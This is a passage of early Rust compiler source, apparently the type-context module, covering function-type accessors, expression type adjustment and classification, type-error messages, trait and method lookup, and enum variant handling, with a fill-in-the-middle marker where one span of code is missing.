fail!("ty_fn_sig() called on non-fn type: {:?}", s) } } } // Type accessors for substructures of types pub fn ty_fn_args(fty: t) -> Vec<t> { match get(fty).sty { ty_bare_fn(ref f) => f.sig.inputs.clone(), ty_closure(ref f) => f.sig.inputs.clone(), ref s => { fail!("ty_fn_args() called on non-fn type: {:?}", s) } } } pub fn ty_closure_sigil(fty: t) -> Sigil { match get(fty).sty { ty_closure(ref f) => f.sigil, ref s => { fail!("ty_closure_sigil() called on non-closure type: {:?}", s) } } } pub fn ty_fn_purity(fty: t) -> ast::Purity { match get(fty).sty { ty_bare_fn(ref f) => f.purity, ty_closure(ref f) => f.purity, ref s => { fail!("ty_fn_purity() called on non-fn type: {:?}", s) } } } pub fn ty_fn_ret(fty: t) -> t { match get(fty).sty { ty_bare_fn(ref f) => f.sig.output, ty_closure(ref f) => f.sig.output, ref s => { fail!("ty_fn_ret() called on non-fn type: {:?}", s) } } } pub fn is_fn_ty(fty: t) -> bool { match get(fty).sty { ty_bare_fn(_) => true, ty_closure(_) => true, _ => false } } pub fn ty_vstore(ty: t) -> vstore { match get(ty).sty { ty_vec(_, vstore) => vstore, ty_str(vstore) => vstore, ref s => fail!("ty_vstore() called on invalid sty: {:?}", s) } } pub fn ty_region(tcx: &ctxt, span: Span, ty: t) -> Region { match get(ty).sty { ty_rptr(r, _) => r, ty_vec(_, vstore_slice(r)) => r, ty_str(vstore_slice(r)) => r, ref s => { tcx.sess.span_bug( span, format!("ty_region() invoked on in appropriate ty: {:?}", s)); } } } pub fn replace_fn_sig(cx: &ctxt, fsty: &sty, new_sig: FnSig) -> t { match *fsty { ty_bare_fn(ref f) => mk_bare_fn(cx, BareFnTy {sig: new_sig, ..*f}), ty_closure(ref f) => mk_closure(cx, ClosureTy {sig: new_sig, ..**f}), ref s => { cx.sess.bug( format!("ty_fn_sig() called on non-fn type: {:?}", s)); } } } pub fn replace_closure_return_type(tcx: &ctxt, fn_type: t, ret_type: t) -> t { /*! * * Returns a new function type based on `fn_type` but returning a value of * type `ret_type` instead. */ match ty::get(fn_type).sty { ty::ty_closure(ref fty) => { ty::mk_closure(tcx, ClosureTy { sig: FnSig {output: ret_type, ..fty.sig.clone()}, ..(**fty).clone() }) } _ => { tcx.sess.bug(format!( "replace_fn_ret() invoked with non-fn-type: {}", ty_to_str(tcx, fn_type))); } } } // Returns a vec of all the input and output types of fty. pub fn tys_in_fn_sig(sig: &FnSig) -> Vec<t> { sig.inputs.iter().map(|a| *a).collect::<Vec<_>>().append_one(sig.output) } // Type accessors for AST nodes pub fn block_ty(cx: &ctxt, b: &ast::Block) -> t { return node_id_to_type(cx, b.id); } // Returns the type of a pattern as a monotype. Like @expr_ty, this function // doesn't provide type parameter substitutions. pub fn pat_ty(cx: &ctxt, pat: &ast::Pat) -> t { return node_id_to_type(cx, pat.id); } // Returns the type of an expression as a monotype. // // NB (1): This is the PRE-ADJUSTMENT TYPE for the expression. That is, in // some cases, we insert `AutoAdjustment` annotations such as auto-deref or // auto-ref. The type returned by this function does not consider such // adjustments. See `expr_ty_adjusted()` instead. // // NB (2): This type doesn't provide type parameter substitutions; e.g. if you // ask for the type of "id" in "id(3)", it will return "fn(&int) -> int" // instead of "fn(t) -> T with T = int". If this isn't what you want, see // expr_ty_params_and_ty() below. pub fn expr_ty(cx: &ctxt, expr: &ast::Expr) -> t { return node_id_to_type(cx, expr.id); } pub fn expr_ty_opt(cx: &ctxt, expr: &ast::Expr) -> Option<t> { return node_id_to_type_opt(cx, expr.id); } pub fn expr_ty_adjusted(cx: &ctxt, expr: &ast::Expr, method_map: &FnvHashMap<MethodCall, MethodCallee>) -> t { /*! * * Returns the type of `expr`, considering any `AutoAdjustment` * entry recorded for that expression. * * It would almost certainly be better to store the adjusted ty in with * the `AutoAdjustment`, but I opted not to do this because it would * require serializing and deserializing the type and, although that's not * hard to do, I just hate that code so much I didn't want to touch it * unless it was to fix it properly, which seemed a distraction from the * task at hand! -nmatsakis */ let unadjusted_ty = expr_ty(cx, expr); let adjustment = cx.adjustments.borrow().find_copy(&expr.id); adjust_ty(cx, expr.span, expr.id, unadjusted_ty, adjustment, |method_call| { method_map.find(&method_call).map(|method| method.ty) }) } pub fn expr_span(cx: &ctxt, id: NodeId) -> Span { match cx.map.find(id) { Some(ast_map::NodeExpr(e)) => { e.span } Some(f) => { cx.sess.bug(format!("Node id {} is not an expr: {:?}", id, f)); } None => { cx.sess.bug(format!("Node id {} is not present \ in the node map", id)); } } } pub fn local_var_name_str(cx: &ctxt, id: NodeId) -> InternedString { match cx.map.find(id) { Some(ast_map::NodeLocal(pat)) => { match pat.node { ast::PatIdent(_, ref path, _) => { token::get_ident(ast_util::path_to_ident(path)) } _ => { cx.sess.bug( format!("Variable id {} maps to {:?}, not local", id, pat)); } } } r => { cx.sess.bug( format!("Variable id {} maps to {:?}, not local", id, r)); } } } pub fn adjust_ty(cx: &ctxt, span: Span, expr_id: ast::NodeId, unadjusted_ty: ty::t, adjustment: Option<@AutoAdjustment>, method_type: |MethodCall| -> Option<ty::t>) -> ty::t { /*! See `expr_ty_adjusted` */ return match adjustment { Some(adjustment) => { match *adjustment { AutoAddEnv(r, s) => { match ty::get(unadjusted_ty).sty { ty::ty_bare_fn(ref b) => { ty::mk_closure( cx, ty::ClosureTy {purity: b.purity, sigil: s, onceness: ast::Many, region: r, bounds: ty::AllBuiltinBounds(), sig: b.sig.clone()}) } ref b => { cx.sess.bug( format!("add_env adjustment on non-bare-fn: \ {:?}", b)); } } } AutoDerefRef(ref adj) => { let mut adjusted_ty = unadjusted_ty; if !ty::type_is_error(adjusted_ty) { for i in range(0, adj.autoderefs) { match method_type(MethodCall::autoderef(expr_id, i as u32)) { Some(method_ty) => { adjusted_ty = ty_fn_ret(method_ty); } None => {} } match deref(adjusted_ty, true) { Some(mt) => { adjusted_ty = mt.ty; } None => { cx.sess.span_bug( span, format!("the {}th autoderef failed: \ {}", i, ty_to_str(cx, adjusted_ty))); } } } } match adj.autoref { None => adjusted_ty, Some(ref autoref) => { match *autoref { AutoPtr(r, m) => { mk_rptr(cx, r, mt { ty: adjusted_ty, mutbl: m }) } AutoBorrowVec(r, m) => { borrow_vec(cx, span, r, m, adjusted_ty) } AutoBorrowVecRef(r, m) => { adjusted_ty = borrow_vec(cx, span, r, m, adjusted_ty); mk_rptr(cx, r, mt { ty: adjusted_ty, mutbl: ast::MutImmutable }) } AutoBorrowFn(r) => { borrow_fn(cx, span, r, adjusted_ty) } AutoUnsafe(m) => { mk_ptr(cx, mt {ty: adjusted_ty, mutbl: m}) } AutoBorrowObj(r, m) => { borrow_obj(cx, span, r, m, adjusted_ty) } } } } } AutoObject(ref sigil, ref region, m, b, def_id, ref substs) => { trait_adjustment_to_ty(cx, sigil, region, def_id, substs, m, b) } } } None => unadjusted_ty }; fn borrow_vec(cx: &ctxt, span: Span, r: Region, m: ast::Mutability, ty: ty::t) -> ty::t { match get(ty).sty { ty_vec(mt, _) => { ty::mk_vec(cx, mt {ty: mt.ty, mutbl: m}, vstore_slice(r)) } ty_str(_) => { ty::mk_str(cx, vstore_slice(r)) } ref s => { cx.sess.span_bug( span, format!("borrow-vec associated with bad sty: {:?}", s)); } } } fn borrow_fn(cx: &ctxt, span: Span, r: Region, ty: ty::t) -> ty::t { match get(ty).sty { ty_closure(ref fty) => { ty::mk_closure(cx, ClosureTy { sigil: BorrowedSigil, region: r, ..(**fty).clone() }) } ref s => { cx.sess.span_bug( span, format!("borrow-fn associated with bad sty: {:?}", s)); } } } fn borrow_obj(cx: &ctxt, span: Span, r: Region, m: ast::Mutability, ty: ty::t) -> ty::t { match get(ty).sty { ty_trait(~ty::TyTrait {def_id, ref substs, bounds, .. }) => { ty::mk_trait(cx, def_id, substs.clone(), RegionTraitStore(r), m, bounds) } ref s => { cx.sess.span_bug( span, format!("borrow-trait-obj associated with bad sty: {:?}", s)); } } } } pub fn trait_adjustment_to_ty(cx: &ctxt, sigil: &ast::Sigil, region: &Option<Region>, def_id: ast::DefId, substs: &substs, m: ast::Mutability, bounds: BuiltinBounds) -> t { let trait_store = match *sigil { BorrowedSigil => RegionTraitStore(region.expect("expected valid region")), OwnedSigil => UniqTraitStore, ManagedSigil => unreachable!() }; mk_trait(cx, def_id, substs.clone(), trait_store, m, bounds) } impl AutoRef { pub fn map_region(&self, f: |Region| -> Region) -> AutoRef { match *self { ty::AutoPtr(r, m) => ty::AutoPtr(f(r), m), ty::AutoBorrowVec(r, m) => ty::AutoBorrowVec(f(r), m), ty::AutoBorrowVecRef(r, m) => ty::AutoBorrowVecRef(f(r), m), ty::AutoBorrowFn(r) => ty::AutoBorrowFn(f(r)), ty::AutoUnsafe(m) => ty::AutoUnsafe(m), ty::AutoBorrowObj(r, m) => ty::AutoBorrowObj(f(r), m), } } } pub struct ParamsTy { params: Vec<t>, ty: t } pub fn expr_ty_params_and_ty(cx: &ctxt, expr: &ast::Expr) -> ParamsTy { ParamsTy { params: node_id_to_type_params(cx, expr.id), ty: node_id_to_type(cx, expr.id) } } pub fn expr_has_ty_params(cx: &ctxt, expr: &ast::Expr) -> bool { return node_id_has_type_params(cx, expr.id); } pub fn method_call_type_param_defs(tcx: &ctxt, origin: typeck::MethodOrigin) -> Rc<Vec<TypeParameterDef>> { match origin { typeck::MethodStatic(did) => { // n.b.: When we encode impl methods, the bounds // that we encode include both the impl bounds // and then the method bounds themselves... ty::lookup_item_type(tcx, did).generics.type_param_defs } typeck::MethodParam(typeck::MethodParam { trait_id: trt_id, method_num: n_mth, ..}) | typeck::MethodObject(typeck::MethodObject { trait_id: trt_id, method_num: n_mth, ..}) => { // ...trait methods bounds, in contrast, include only the // method bounds, so we must preprend the tps from the // trait itself. This ought to be harmonized. let trait_type_param_defs = lookup_trait_def(tcx, trt_id).generics.type_param_defs(); Rc::new(Vec::from_slice(trait_type_param_defs).append( ty::trait_method(tcx, trt_id, n_mth).generics.type_param_defs())) } } } pub fn resolve_expr(tcx: &ctxt, expr: &ast::Expr) -> ast::Def { match tcx.def_map.borrow().find(&expr.id) { Some(&def) => def, None => { tcx.sess.span_bug(expr.span, format!( "no def-map entry for expr {:?}", expr.id)); } } } pub fn expr_is_lval(tcx: &ctxt, method_map: MethodMap, e: &ast::Expr) -> bool { match expr_kind(tcx, method_map, e) { LvalueExpr => true, RvalueDpsExpr | RvalueDatumExpr | RvalueStmtExpr => false } } /// We categorize expressions into three kinds. The distinction between /// lvalue/rvalue is fundamental to the language. The distinction between the /// two kinds of rvalues is an artifact of trans which reflects how we will /// generate code for that kind of expression. See trans/expr.rs for more /// information. pub enum ExprKind { LvalueExpr, RvalueDpsExpr, RvalueDatumExpr, RvalueStmtExpr } pub fn expr_kind(tcx: &ctxt, method_map: MethodMap, expr: &ast::Expr) -> ExprKind { if method_map.borrow().contains_key(&MethodCall::expr(expr.id)) { // Overloaded operations are generally calls, and hence they are // generated via DPS, but there are two exceptions: return match expr.node { // `a += b` has a unit result. ast::ExprAssignOp(..) => RvalueStmtExpr, // the deref method invoked for `*a` always yields an `&T` ast::ExprUnary(ast::UnDeref, _) => LvalueExpr, // in the general case, result could be any type, use DPS _ => RvalueDpsExpr }; } match expr.node { ast::ExprPath(..) => { match resolve_expr(tcx, expr) { ast::DefVariant(tid, vid, _) => { let variant_info = enum_variant_with_id(tcx, tid, vid); if variant_info.args.len() > 0u { // N-ary variant. RvalueDatumExpr } else { // Nullary variant. RvalueDpsExpr } } ast::DefStruct(_) => { match get(expr_ty(tcx, expr)).sty { ty_bare_fn(..) => RvalueDatumExpr, _ => RvalueDpsExpr } } // Fn pointers are just scalar values. ast::DefFn(..) | ast::DefStaticMethod(..) => RvalueDatumExpr, // Note: there is actually a good case to be made that // DefArg's, particularly those of immediate type, ought to // considered rvalues. ast::DefStatic(..) | ast::DefBinding(..) | ast::DefUpvar(..) | ast::DefArg(..) | ast::DefLocal(..) => LvalueExpr, def => { tcx.sess.span_bug(expr.span, format!( "uncategorized def for expr {:?}: {:?}", expr.id, def)); } } } ast::ExprUnary(ast::UnDeref, _) | ast::ExprField(..) | ast::ExprIndex(..) => { LvalueExpr } ast::ExprCall(..) | ast::ExprMethodCall(..) | ast::ExprStruct(..) | ast::ExprTup(..) | ast::ExprIf(..) | ast::ExprMatch(..) | ast::ExprFnBlock(..) | ast::ExprProc(..) | ast::ExprBlock(..) | ast::ExprRepeat(..) | ast::ExprVstore(_, ast::ExprVstoreSlice) | ast::ExprVstore(_, ast::ExprVstoreMutSlice) | ast::ExprVec(..) => { RvalueDpsExpr } ast::ExprLit(lit) if lit_is_str(lit) => { RvalueDpsExpr } ast::ExprCast(..) => { match tcx.node_types.borrow().find(&(expr.id as uint)) { Some(&t) => { if type_is_trait(t) { RvalueDpsExpr } else { RvalueDatumExpr } } None => { // Technically, it should not happen that the expr is not // present within the table. However, it DOES happen // during type check, because the final types from the // expressions are not yet recorded in the tcx. At that // time, though, we are only interested in knowing lvalue // vs rvalue. It would be better to base this decision on // the AST type in cast node---but (at the time of this // writing) it's not easy to distinguish casts to traits // from other casts based on the AST. This should be // easier in the future, when casts to traits // would like @Foo, ~Foo, or &Foo. RvalueDatumExpr } } } ast::ExprBreak(..) | ast::ExprAgain(..) | ast::ExprRet(..) | ast::ExprWhile(..) | ast::ExprLoop(..) | ast::ExprAssign(..) | ast::ExprInlineAsm(..) | ast::ExprAssignOp(..) => { RvalueStmtExpr } ast::ExprForLoop(..) => fail!("non-desugared expr_for_loop"), ast::ExprLit(_) | // Note: LitStr is carved out above ast::ExprUnary(..) | ast::ExprAddrOf(..) | ast::ExprBinary(..) | ast::ExprVstore(_, ast::ExprVstoreUniq) => { RvalueDatumExpr } ast::ExprBox(place, _) => { // Special case `~T` for now: let definition = match tcx.def_map.borrow().find(&place.id) { Some(&def) => def, None => fail!("no def for place"), }; let def_id = ast_util::def_id_of_def(definition); match tcx.lang_items.items.get(ExchangeHeapLangItem as uint) { &Some(item_def_id) if def_id == item_def_id => { RvalueDatumExpr } &Some(_) | &None => RvalueDpsExpr, } } ast::ExprParen(e) => expr_kind(tcx, method_map, e), ast::ExprMac(..) => { tcx.sess.span_bug( expr.span, "macro expression remains after expansion"); } } } pub fn stmt_node_id(s: &ast::Stmt) -> ast::NodeId { match s.node { ast::StmtDecl(_, id) | StmtExpr(_, id) | StmtSemi(_, id) => { return id; } ast::StmtMac(..) => fail!("unexpanded macro in trans") } } pub fn field_idx(name: ast::Name, fields: &[field]) -> Option<uint> { let mut i = 0u; for f in fields.iter() { if f.ident.name == name { return Some(i); } i += 1u; } return None; } pub fn field_idx_strict(tcx: &ctxt, name: ast::Name, fields: &[field]) -> uint { let mut i = 0u; for f in fields.iter() { if f.ident.name == name { return i; } i += 1u; } tcx.sess.bug(format!( "no field named `{}` found in the list of fields `{:?}`", token::get_name(name), fields.iter().map(|f| token::get_ident(f.ident).get().to_str()).collect::<Vec<~str>>())); } pub fn method_idx(id: ast::Ident, meths: &[@Method]) -> Option<uint> { meths.iter().position(|m| m.ident == id) } /// Returns a vector containing the indices of all type parameters that appear /// in `ty`. The vector may contain duplicates. Probably should be converted /// to a bitset or some other representation. pub fn param_tys_in_type(ty: t) -> Vec<param_ty> { let mut rslt = Vec::new(); walk_ty(ty, |ty| { match get(ty).sty { ty_param(p) => { rslt.push(p); } _ => () } }); rslt } pub fn ty_sort_str(cx: &ctxt, t: t) -> ~str { match get(t).sty { ty_nil | ty_bot | ty_bool | ty_char | ty_int(_) | ty_uint(_) | ty_float(_) | ty_str(_) => { ::util::ppaux::ty_to_str(cx, t) } ty_enum(id, _) => format!("enum {}", item_path_str(cx, id)), ty_box(_) => ~"@-ptr", ty_uniq(_) => ~"~-ptr", ty_vec(_, _) => ~"vector", ty_unboxed_vec(_) => ~"unboxed vector", ty_ptr(_) => ~"*-ptr", ty_rptr(_, _) => ~"&-ptr", ty_bare_fn(_) => ~"extern fn", ty_closure(_) => ~"fn", ty_trait(ref inner) => format!("trait {}", item_path_str(cx, inner.def_id)), ty_struct(id, _) => format!("struct {}", item_path_str(cx, id)), ty_tup(_) => ~"tuple", ty_infer(TyVar(_)) => ~"inferred type", ty_infer(IntVar(_)) => ~"integral variable", ty_infer(FloatVar(_)) => ~"floating-point variable", ty_param(_) => ~"type parameter", ty_self(_) => ~"self", ty_err => ~"type error" } } pub fn type_err_to_str(cx: &ctxt, err: &type_err) -> ~str { /*! * * Explains the source of a type err in a short, * human readable way. This is meant to be placed in * parentheses after some larger message. You should * also invoke `note_and_explain_type_err()` afterwards * to present additional details, particularly when * it comes to lifetime-related errors. */ fn terr_vstore_kind_to_str(k: terr_vstore_kind) -> ~str { match k { terr_vec => ~"[]", terr_str => ~"str", terr_fn => ~"fn", terr_trait => ~"trait" } } match *err { terr_mismatch => ~"types differ", terr_purity_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_abi_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_onceness_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_sigil_mismatch(values) => { format!("expected {} closure, found {} closure", values.expected.to_str(), values.found.to_str()) } terr_mutability => ~"values differ in mutability", terr_box_mutability => ~"boxed values differ in mutability", terr_vec_mutability => ~"vectors differ in mutability", terr_ptr_mutability => ~"pointers differ in mutability", terr_ref_mutability => ~"references differ in mutability", terr_ty_param_size(values) => { format!("expected a type with {} type params \ but found one with {} type params", values.expected, values.found) } terr_tuple_size(values) => { format!("expected a tuple with {} elements \ but found one with {} elements", values.expected, values.found) } terr_record_size(values) => { format!("expected a record with {} fields \ but found one with {} fields", values.expected, values.found) } terr_record_mutability => { ~"record elements differ in mutability" } terr_record_fields(values) => { format!("expected a record with field `{}` but found one with field \ `{}`", token::get_ident(values.expected), token::get_ident(values.found)) } terr_arg_count => ~"incorrect number of function parameters", terr_regions_does_not_outlive(..) => { format!("lifetime mismatch") } terr_regions_not_same(..) => { format!("lifetimes are not the same") } terr_regions_no_overlap(..) => { format!("lifetimes do not intersect") } terr_regions_insufficiently_polymorphic(br, _) => { format!("expected bound lifetime parameter {}, \ but found concrete lifetime", bound_region_ptr_to_str(cx, br)) } terr_regions_overly_polymorphic(br, _) => { format!("expected concrete lifetime, \ but found bound lifetime parameter {}", bound_region_ptr_to_str(cx, br)) } terr_vstores_differ(k, ref values) => { format!("{} storage differs: expected `{}` but found `{}`", terr_vstore_kind_to_str(k), vstore_to_str(cx, (*values).expected), vstore_to_str(cx, (*values).found)) } terr_trait_stores_differ(_, ref values) => { format!("trait storage differs: expected `{}` but found `{}`", trait_store_to_str(cx, (*values).expected), trait_store_to_str(cx, (*values).found)) } terr_in_field(err, fname) => { format!("in field `{}`, {}", token::get_ident(fname), type_err_to_str(cx, err)) } terr_sorts(values) => { format!("expected {} but found {}", ty_sort_str(cx, values.expected), ty_sort_str(cx, values.found)) } terr_traits(values) => { format!("expected trait `{}` but found trait `{}`", item_path_str(cx, values.expected), item_path_str(cx, values.found)) } terr_builtin_bounds(values) => { if values.expected.is_empty() { format!("expected no bounds but found `{}`", values.found.user_string(cx)) } else if values.found.is_empty() { format!("expected bounds `{}` but found no bounds", values.expected.user_string(cx)) } else { format!("expected bounds `{}` but found bounds `{}`", values.expected.user_string(cx), values.found.user_string(cx)) } } terr_integer_as_char => { format!("expected an integral type but found `char`") } terr_int_mismatch(ref values) => { format!("expected `{}` but found `{}`", values.expected.to_str(), values.found.to_str()) } terr_float_mismatch(ref values) => { format!("expected `{}` but found `{}`", values.expected.to_str(), values.found.to_str()) } terr_variadic_mismatch(ref values) => { format!("expected {} fn but found {} function", if values.expected { "variadic" } else { "non-variadic" }, if values.found { "variadic" } else { "non-variadic" }) } } } pub fn note_and_explain_type_err(cx: &ctxt, err: &type_err) { match *err { terr_regions_does_not_outlive(subregion, superregion) => { note_and_explain_region(cx, "", subregion, "..."); note_and_explain_region(cx, "...does not necessarily outlive ", superregion, ""); } terr_regions_not_same(region1, region2) => { note_and_explain_region(cx, "", region1, "..."); note_and_explain_region(cx, "...is not the same lifetime as ", region2, ""); } terr_regions_no_overlap(region1, region2) => { note_and_explain_region(cx, "", region1, "..."); note_and_explain_region(cx, "...does not overlap ", region2, ""); } terr_regions_insufficiently_polymorphic(_, conc_region) => { note_and_explain_region(cx, "concrete lifetime that was found is ", conc_region, ""); } terr_regions_overly_polymorphic(_, conc_region) => { note_and_explain_region(cx, "expected concrete lifetime is ", conc_region, ""); } _ => {} } } pub fn def_has_ty_params(def: ast::Def) -> bool { match def { ast::DefFn(_, _) | ast::DefVariant(_, _, _) | ast::DefStruct(_) => true, _ => false } } pub fn provided_source(cx: &ctxt, id: ast::DefId) -> Option<ast::DefId> { cx.provided_method_sources.borrow().find(&id).map(|x| *x) } pub fn provided_trait_methods(cx: &ctxt, id: ast::DefId) -> Vec<@Method> { if is_local(id) { { match cx.map.find(id.node) { Some(ast_map::NodeItem(item)) => { match item.node { ItemTrait(_, _, ref ms) => { let (_, p) = ast_util::split_trait_methods(ms.as_slice()); p.iter() .map(|m| method(cx, ast_util::local_def(m.id))) .collect() } _ => { cx.sess.bug(format!("provided_trait_methods: \ `{:?}` is not a trait", id)) } } } _ => { cx.sess.bug(format!("provided_trait_methods: `{:?}` is not \ a trait", id)) } } } } else { csearch::get_provided_trait_methods(cx, id) } } pub fn trait_supertraits(cx: &ctxt, id: ast::DefId) -> @Vec<@TraitRef> { // Check the cache. match cx.supertraits.borrow().find(&id) { Some(&trait_refs) => { return trait_refs; } None => {} // Continue. } // Not in the cache. It had better be in the metadata, which means it // shouldn't be local. assert!(!is_local(id)); // Get the supertraits out of the metadata and create the // TraitRef for each. let result = @csearch::get_supertraits(cx, id); cx.supertraits.borrow_mut().insert(id, result); return result; } pub fn trait_ref_supertraits(cx: &ctxt, trait_ref: &ty::TraitRef) -> Vec<@TraitRef> { let supertrait_refs = trait_supertraits(cx, trait_ref.def_id); supertrait_refs.iter().map( |supertrait_ref| supertrait_ref.subst(cx, &trait_ref.substs)).collect() } fn lookup_locally_or_in_crate_store<V:Clone>( descr: &str, def_id: ast::DefId, map: &mut DefIdMap<V>, load_external: || -> V) -> V { /*! * Helper for looking things up in the various maps * that are populated during typeck::collect (e.g., * `cx.methods`, `cx.tcache`, etc). All of these share * the pattern that if the id is local, it should have * been loaded into the map by the `typeck::collect` phase. * If the def-id is external, then we have to go consult * the crate loading code (and cache the result for the future). */ match map.find_copy(&def_id) { Some(v) => { return v; } None => { } } if def_id.krate == ast::LOCAL_CRATE { fail!("No def'n found for {:?} in tcx.{}", def_id, descr); } let v = load_external(); map.insert(def_id, v.clone()); v } pub fn trait_method(cx: &ctxt, trait_did: ast::DefId, idx: uint) -> @Method { let method_def_id = *ty::trait_method_def_ids(cx, trait_did).get(idx); ty::method(cx, method_def_id) } pub fn trait_methods(cx: &ctxt, trait_did: ast::DefId) -> @Vec<@Method> { let mut trait_methods = cx.trait_methods_cache.borrow_mut(); match trait_methods.find(&trait_did) { Some(&methods) => methods, None => { let def_ids = ty::trait_method_def_ids(cx, trait_did); let methods = @def_ids.iter().map(|d| ty::method(cx, *d)).collect(); trait_methods.insert(trait_did, methods); methods } } } pub fn method(cx: &ctxt, id: ast::DefId) -> @Method { lookup_locally_or_in_crate_store("methods", id, &mut *cx.methods.borrow_mut(), || { @csearch::get_method(cx, id) }) } pub fn trait_method_def_ids(cx: &ctxt, id: ast::DefId) -> @Vec<DefId> { lookup_locally_or_in_crate_store("trait_method_def_ids", id, &mut *cx.trait_method_def_ids.borrow_mut(), || { @csearch::get_trait_method_def_ids(&cx.sess.cstore, id) }) } pub fn impl_trait_ref(cx: &ctxt, id: ast::DefId) -> Option<@TraitRef> { match cx.impl_trait_cache.borrow().find(&id) { Some(&ret) => { return ret; } None => {} } let ret = if id.krate == ast::LOCAL_CRATE { debug!("(impl_trait_ref) searching for trait impl {:?}", id); match cx.map.find(id.node) { Some(ast_map::NodeItem(item)) => { match item.node { ast::ItemImpl(_, ref opt_trait, _, _) => { match opt_trait { &Some(ref t) => { Some(ty::node_id_to_trait_ref(cx, t.ref_id)) } &None => None } } _ => None } } _ => None } } else { csearch::get_impl_trait(cx, id) }; cx.impl_trait_cache.borrow_mut().insert(id, ret); return ret; } pub fn trait_ref_to_def_id(tcx: &ctxt, tr: &ast::TraitRef) -> ast::DefId { let def = *tcx.def_map.borrow() .find(&tr.ref_id) .expect("no def-map entry for trait"); ast_util::def_id_of_def(def) } pub fn try_add_builtin_trait(tcx: &ctxt, trait_def_id: ast::DefId, builtin_bounds: &mut BuiltinBounds) -> bool { //! Checks whether `trait_ref` refers to one of the builtin //! traits, like `Send`, and adds the corresponding //! bound to the set `builtin_bounds` if so. Returns true if `trait_ref` //! is a builtin trait. match tcx.lang_items.to_builtin_kind(trait_def_id) { Some(bound) => { builtin_bounds.add(bound); true } None => false } } pub fn ty_to_def_id(ty: t) -> Option<ast::DefId> { match get(ty).sty { ty_trait(~TyTrait { def_id: id, .. }) | ty_struct(id, _) | ty_enum(id, _) => Some(id), _ => None } } // Enum information #[deriving(Clone)] pub struct VariantInfo { args: Vec<t>, arg_names: Option<Vec<ast::Ident> >, ctor_ty: t, name: ast::Ident, id: ast::DefId, disr_val: Disr, vis: Visibility } impl VariantInfo { /// Creates a new VariantInfo from the corresponding ast representation. /// /// Does not do any caching of the value in the type context. pub fn from_ast_variant(cx: &ctxt, ast_variant: &ast::Variant, discriminant: Disr) -> VariantInfo { let ctor_ty = node_id_to_type(cx, ast_variant.node.id); match ast_variant.node.kind { ast::TupleVariantKind(ref args) => { let arg_tys = if args.len() > 0 { ty_fn_args(ctor_ty).iter().map(|a| *a).collect() } else { Vec::new() }; return VariantInfo { args: arg_tys, arg_names: None, ctor_ty: ctor_ty, name: ast_variant.node.name, id: ast_util::local_def(ast_variant.node.id), disr_val: discriminant, vis: ast_variant.node.vis }; }, ast::StructVariantKind(ref struct_def) => { let fields: &[StructField] = struct_def.fields.as_slice(); assert!(fields.len() > 0); let arg_tys = ty_fn_args(ctor_ty).iter().map(|a| *a).collect(); let arg_names = fields.iter().map(|field| { match field.node.kind { NamedField(ident, _) => ident, UnnamedField(..) => cx.sess.bug( "enum_variants: all fields in struct must have a name") } }).collect(); return VariantInfo { args: arg_tys, arg_names: Some(arg_names), ctor_ty: ctor_ty, name: ast_variant.node.name, id: ast_util::local_def(ast_variant.node.id), disr_val: discriminant, vis: ast_variant.node.vis }; } } } } pub fn substd_enum_variants(cx: &ctxt, id: ast::DefId, substs: &substs) -> Vec<@VariantInfo> {<|fim▁hole|> .map(|aty| subst(cx, substs, *aty)).collect(); let substd_ctor_ty = subst(cx, substs, variant_info.ctor_ty); @VariantInfo { args: substd_args, ctor_ty: substd_ctor_ty, ..(**variant_info).clone() } }).collect() } pub fn item_path_str(cx: &ctxt, id: ast::DefId) -> ~str { with_path(cx, id, |path| ast_map::path_to_str(path)) } pub enum DtorKind { NoDtor, TraitDtor(DefId, bool) } impl DtorKind { pub fn is_not_present(&self) -> bool { match *self { NoDtor => true, _ => false } } pub fn is_present(&self) -> bool { !self.is_not_present() } pub fn has_drop_flag(&self) -> bool { match self { &NoDtor => false, &TraitDtor(_, flag) => flag } } } /* If struct_id names a struct with a dtor, return Some(the dtor's id). Otherwise return none. */ pub fn ty_dtor(cx: &ctxt, struct_id: DefId) -> DtorKind { match cx.destructor_for_type.borrow().find(&struct_id) { Some(&method_def_id) => { let flag = !has_attr(cx, struct_id, "unsafe_no_drop_flag"); TraitDtor(method_def_id, flag) } None => NoDtor, } } pub fn has_dtor(cx: &ctxt, struct_id: DefId) -> bool { ty_dtor(cx, struct_id).is_present() } pub fn with_path<T>(cx: &ctxt, id: ast::DefId, f: |ast_map::PathElems| -> T) -> T { if id.krate == ast::LOCAL_CRATE { cx.map.with_path(id.node, f) } else { f(ast_map::Values(csearch::get_item_path(cx, id).iter()).chain(None)) } } pub fn enum_is_univariant(cx: &ctxt, id: ast::DefId) -> bool { enum_variants(cx, id).len() == 1 } pub fn type_is_empty(cx: &ctxt, t: t) -> bool { match ty::get(t).sty { ty_enum(did, _) => (*enum_variants(cx, did)).is_empty(), _ => false } } pub fn enum_variants(cx: &ctxt, id: ast::DefId) -> @Vec<@VariantInfo> { match cx.enum_var_cache.borrow().find(&id) { Some(&variants) => return variants, _ => { /* fallthrough */ } } let result = if ast::LOCAL_CRATE != id.krate { @csearch::get_enum_variants(cx, id) } else { /* Although both this code and check_enum_variants in typeck/check call eval_const_expr, it should never get called twice for the same expr, since check_enum_variants also updates the enum_var_cache */ { match cx.map.get(id.node) { ast_map::NodeItem(item) => { match item.node { ast::ItemEnum(ref enum_definition, _) => { let mut last_discriminant: Option<Disr> = None; @enum_definition.variants.iter().map(|&variant| { let mut discriminant = match last_discriminant { Some(val) => val + 1, None => INITIAL_DISCRIMINANT_VALUE }; match variant.node.disr_expr { Some(e) => match const_eval::eval_const_expr_partial(cx, e) { Ok(const_eval::const_int(val)) => { discriminant = val as Disr } Ok(const_eval::const_uint(val)) => { discriminant = val as Disr } Ok(_) => { cx.sess .span_err(e.span, "expected signed integer \ constant"); } Err(ref err) => { cx.sess .span_err(e.span, format!("expected \ constant: {}", *err)); } }, None => {} }; let variant_info = @VariantInfo::from_ast_variant(cx, variant, discriminant); last_discriminant = Some(discriminant); variant_info }).collect() } _ => { cx.sess.bug("enum_variants: id not bound to an enum") } } } _ => cx.sess.bug("enum_variants: id not bound to an enum") } } }; cx.enum_var_cache.borrow_mut().insert(id, result); result } // Returns information about the enum variant with the given ID: pub fn enum_variant_with_id(cx: &ctxt, enum_id: ast::DefId, variant_id: ast::DefId) -> @VariantInfo { let variants = enum_variants(cx, enum_id); let mut i = 